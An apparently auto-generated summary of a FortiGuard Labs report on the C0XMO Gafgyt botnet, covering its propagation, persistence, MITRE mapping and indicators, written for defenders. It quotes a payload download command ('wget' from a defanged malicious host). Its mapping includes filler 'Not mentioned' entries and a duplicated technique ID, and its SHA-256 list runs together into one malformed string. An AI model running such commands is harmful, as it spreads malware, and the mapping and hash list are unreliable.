Threat Research

Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO

Fortinet
Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO

FortiGuard Labs analyzed C0XMO, a modular Gafgyt botnet variant that exploits CVE-2021-27137 on vulnerable DD-WRT routers and uses a separate Python scanner to expand infections across Linux and IoT devices. The malware adds persistence, kills competing botnets, performs a custom C2 handshake, and supports many DDoS and exploitation capabilities targeting services such as Telnet, SSH, UPnP, ADB, and multiple HTTP vulnerabilities. #C0XMO #Gafgyt #CVE-2021-27137 #DDWRT

Keypoints

  • C0XMO is a new Gafgyt botnet variant discovered by FortiGuard Labs in March.
  • It spreads by exploiting CVE-2021-27137 in the UPnP service of vulnerable DD-WRT firmware.
  • Unlike earlier versions, its lateral movement is separated into a standalone Python scanner script.
  • The malware supports persistence through self-copying, cron jobs, shell profile modification, and re-execution.
  • C0XMO kills competing processes and removes rival botnets along with their persistence mechanisms.
  • It uses a custom C2 handshake and supports multiple attack commands, including 19 DDoS methods.
  • The scanner performs brute-force login attempts and HTTP/ADB exploitation to deploy the payload across many architectures.

MITRE Techniques

  • [T1068 ] Exploitation for Privilege Escalation – The bot is delivered by exploiting a router firmware vulnerability in the UPnP service (‘the threat actor delivered the malware by exploiting CVE-2021-27137’).
  • [T1053.003 ] Scheduled Task/Job: Cron – C0XMO creates cron jobs to relaunch itself every 15 minutes (‘The malware then creates cron jobs to run C0XMO every 15 minutes’).
  • [T1547.001 ] Boot or Logon Autostart Execution: Shell Profile Modification – It appends execution commands to shell startup files for persistence (‘C0XMO appends execution commands to multiple shell profile files such as ~/.profile, ~/.bashrc, and ~/.bash_profile’).
  • [T1036 ] Masquerading – The malware copies itself to hidden-looking filenames and paths to blend in (‘generates multiple hidden file paths, including /tmp/.sys, /var/tmp/.sys, and /dev/shm/.sys’).
  • [T1027 ] Obfuscated Files or Information – The bot uses hexadecimal strings and encoded handshake values during C2 communication (‘sends the hexadecimal sequence FF FF FF FF 75 as the final magic value’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – The scanner downloads scripts and communicates via HTTP to fetch payloads and components (‘wget -q http://malicious[.]server/bot.arch’).
  • [T1110.001 ] Brute Force: Password Guessing – The scanner performs weak-credential attacks against Telnet and SSH (‘weak password brute-force attacks on Telnet and SSH services’).
  • [T1021.001 ] Remote Services: Remote Desktop Protocol? – Not mentioned.
  • [T1021.004 ] Remote Services: SSH – The scanner targets SSH for brute-force login and payload delivery (‘SSH weak-credential login’).
  • [T1021.001 ] Remote Services: Telnet – The scanner targets Telnet for weak-credential login and deployment (‘Telnet weak-credential login’).
  • [T1210 ] Exploitation of Remote Services – The scanner uses multiple HTTP-based and ADB exploits to gain initial access (‘HTTP-based exploitation used to achieve initial access’ and ‘exploits unauthorized access vulnerabilities in the Android Debug Bridge (ADB)’).
  • [T1499 ] Endpoint Denial of Service – C0XMO supports many DDoS attack methods such as SYN flood, HTTP flood, and amplification attacks (‘supports 19 different DDoS attack methods’).
  • [T1047 ] Windows Management Instrumentation – Not mentioned.
  • [T1059.006 ] Command and Scripting Interpreter: Python – The lateral movement/scanning capability is isolated into a Python script (‘the malware separates its lateral movement into a standalone Python script’).
  • [T1611 ] Escape to Host – Not mentioned.
  • [T1485 ] Data Destruction – The malware deletes competitor binaries and associated files (‘deletes the corresponding file from the system’).

Indicators of Compromise

  • [IP address ] C2 and distribution infrastructure – 85[.]215[.]131[.]70, 217[.]160[.]125[.]125:15527
  • [File path ] downloaded and dropped malware location – /tmp/.cache, /tmp/.sys, /var/tmp/.sys, and other hidden paths
  • [File name ] scanner and payload artifacts – scanner.py, .cache
  • [SHA-256 hashes ] reported C0XMO samples – 444a9d34a9f59dc7975dfabefb47d789813a4497bbac9127c4806dd816e85211, 9394666007fac4014a4641fdae150c1b969ed2bc4299876318a336fd386abf59450ea44da0c9d96a2e8f4d6bad34f1c35cd35743295b8cd2defa9f7a9884685dd452f22dacab9785539484245c13e9cce58df23fc82eeef205684fcd196da20b20042f1efb59c99e3addf822a3e9e5a496f0b701362df038a50a32a9f504a1367413cbb6eab4d6b10346f71be5dd76d7cf2f4817f7776367b162f83755aefa1fb6f835ced11059d341222eba11fff3a4672f4de47a3a4d791fad86059a2b06d4b61a5508847a2167b737d31193dc393e92c5be2aa5141bbe4b7ea6f440fd4799dff0edae6e8854ddd3e617054ee0bd74c696c91411f704dff60aabaec839bec9ea44138b9701fce1b2fe13de8f9e00681c007c9adc625edc9f507f177704c2e83ddb67ab079509dd1e7ac77fc4cfed25a271526668c68f8a2221e96a4cc21812f02b1d8010dac35b007796def0cbd5d0c9414df790e2b55b105c95df2f2ffa918fc2d35b66c692d37a85ae9d30dc5c7f06f0b3eaf01112a5a6398a1a0feb3aeeeead44c0af7ddb12cece1a6125cf213bab3c22511cd59aff9d63dcfddb7d4386eead44c0af7ddb12cece1a6125cf213bab3c22511cd59aff9d63dcfddb7d438641e8e327abbf2ba721be677ad8a416a7295708257b39688a0af03275fb199cec
  • [URL ] payload and script download source – http://malicious[.]server/bot.arch

Read more: https://feeds.fortinet.com/~/957685901/0/fortinet/blog/threat-research~Inside-the-CrossPlatform-Propagation-of-a-New-Gafgyt-Variant-CXMO

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint